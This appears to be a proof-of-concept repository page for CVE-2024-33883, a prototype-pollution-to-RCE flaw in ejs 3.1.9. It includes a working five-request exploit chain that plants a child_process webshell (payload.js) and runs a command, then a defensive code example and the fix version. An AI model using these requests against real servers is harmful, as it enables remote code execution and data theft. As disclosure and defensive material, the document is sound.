PoC details: 5617a74f646a192644e499a26ffd1967848bbe4c

Source
Related vulnerability
Title: ejs security vulnerability (CVE-2024-33883)
Description: GitHub ejs is an embedded JavaScript templating library. ejs (Embedded JavaScript templates) versions before 3.1.10 contain a security vulnerability caused by a lack of certain pollution protection.
Description
PoC of CVE-2024-33883, RCE vulnerability of ejs.
Introduction
# CVE-2024-33883

### ejs@3.1.9, Insufficient Prototype Pollution Validation Leading to RCE Exploitation

- With prototype pollution, set `opts.client` to a truthy value (the precondition).
- Then, when `render()` runs, ejs evaluates the `opts.escapeFunction` value as JavaScript code.

## Vulnerable Code Range

Based on ejs@3.1.9

**1. ejs/lib/ejs.js - lines 580, 636, 637**


## PoC (Inject webshell & activate)

```
1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inject webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activate webshell
```

- The PoC above works even when the ufw firewall drops outbound packets.

- **All versions below 3.1.10 are vulnerable to this type of attack.**

- This is an RCE vulnerability; do not abuse it on live servers.

## Attack available condition

1. Requires control of `render()`.
2. Requires control of a prototype pollution attack vector.

- When both conditions above hold, an RCE attack is possible.

## How can I prevent this attack?

- A fixed version (ejs@3.1.10) is available now.
File snapshot
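As an added illustration (not ejs's own source or its 3.1.10 patch), the JavaScript below shows the defensive property the fix has to provide: an options reader written as `opts.client || false` picks up keys injected into `Object.prototype`, whereas a reader that first copies only own properties into a null-prototype object never sees them. The names `ownOnly`, `readOptionsNaive`, `readOptionsHardened`, `simulatePollution` and `demo` are assumptions made for this example; `client` and `escapeFunction` are the ejs option names the README refers to. The pollution is simulated in-process on a constructed empty options object and undone afterwards, so the block doubles as a regression check for the hardened reader.

```javascript
// Added illustration, not ejs code: own-property-only option reading as a
// prototype-pollution defence. Helper names are hypothetical.

function hasOwn(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key);
}

// Copy only the object's own enumerable properties into a null-prototype
// object. Keys living on Object.prototype are enumerated by for...in but
// rejected by hasOwn, so they never reach the copy.
function ownOnly(obj) {
  const out = Object.create(null);
  for (const key in obj) {
    if (hasOwn(obj, key)) out[key] = obj[key];
  }
  return out;
}

const ESCAPES = { '<': '&lt;', '>': '&gt;', '&': '&amp;' };
function defaultEscape(s) {
  return String(s).replace(/[<>&]/g, (c) => ESCAPES[c]);
}

// Naive reader: property lookups walk the prototype chain, so a polluted
// Object.prototype.client or Object.prototype.escapeFunction is honoured.
function readOptionsNaive(opts) {
  opts = opts || {};
  return {
    client: opts.client || false,
    escapeFunction: opts.escapeFunction || defaultEscape,
  };
}

// Hardened reader: same defaults, but every lookup goes through an
// own-property-only, null-prototype copy of the caller's options.
function readOptionsHardened(opts) {
  const own = ownOnly(opts || {});
  return {
    client: own.client || false,
    escapeFunction: own.escapeFunction || defaultEscape,
  };
}

// Simulate the pollution the README describes (constructed, in-process only)
// and guarantee it is removed again whatever fn does.
function simulatePollution(fn) {
  Object.prototype.client = 1;
  Object.prototype.escapeFunction = 'not a function';
  try {
    return fn();
  } finally {
    delete Object.prototype.client;
    delete Object.prototype.escapeFunction;
  }
}

// Run both readers against an empty options object while the prototype is
// polluted and report what each one would hand to the template engine.
function demo() {
  return simulatePollution(() => {
    const naive = readOptionsNaive({});
    const hardened = readOptionsHardened({});
    return {
      naiveClient: naive.client,                                   // 1 (polluted)
      naiveEscapeIsFunction: typeof naive.escapeFunction === 'function', // false
      hardenedClient: hardened.client,                             // false
      hardenedEscapeIsFunction: typeof hardened.escapeFunction === 'function', // true
    };
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The hardened reader is the shape to look for when reviewing any code that reads template or renderer options from an object an attacker might influence: copy own properties first, then apply defaults, rather than relying on `||` against a lookup that can be satisfied by the prototype.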

```
[4.0K] /data/pocs/5617a74f646a192644e499a26ffd1967848bbe4c
├── [ 733] app.js
├── [ 104] Dockerfile
├── [4.0K] ejs
│   └── [ 39] index.ejs
├── [ 7] Leak_target
├── [ 382] package.json
├── [ 33K] package-lock.json
├── [ 194] payload.js
└── [1.3K] README.md

1 directory, 8 files
```